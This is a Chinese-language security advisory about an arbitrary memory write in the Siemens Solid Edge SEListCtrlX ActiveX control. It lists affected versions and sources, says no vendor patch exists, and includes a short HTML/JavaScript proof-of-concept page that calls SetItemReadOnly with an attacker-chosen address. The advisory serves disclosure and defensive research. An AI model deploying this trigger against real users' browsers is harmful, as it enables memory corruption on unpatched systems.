安全研究

安全漏洞
Siemens Solid Edge SEListCtrlX ActiveX内存破坏漏洞

发布日期:2013-05-26
更新日期:2013-05-28

受影响系统:
Siemens Solid Edge ST5 105.x
Siemens SEListCtrlX ActiveX Control 105.x
Siemens WebPartHelper ActiveX Control 105.x
描述:
BUGTRAQ  ID: 60161

SolidEdge是Siemens PLM Software公司旗下的三维CAD软件,采用Siemens PLM Software公司自己拥有专利的Parasolid作为软件核心,将普及型CAD系统与世界上最具领先地位的实体造型引擎结合在一起,是基于Windows平台、功能强大且易用的三维CAD软件。

Siemens Solid Edge SEListCtrlX ActiveX控件内存在不安全的方法 "SetItemReadOnly()" (SEListCTRLX.ocx),可使远程攻击者在任意内存位置写入一些值。

<*来源:rgod (rgod@autistici.org
  
  链接:http://secunia.com/advisories/53595/
        http://retrogod.altervista.org/9sg_siemens_adv_ii.htm
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>

建议:
厂商补丁:

Siemens
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

浏览次数:4323
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障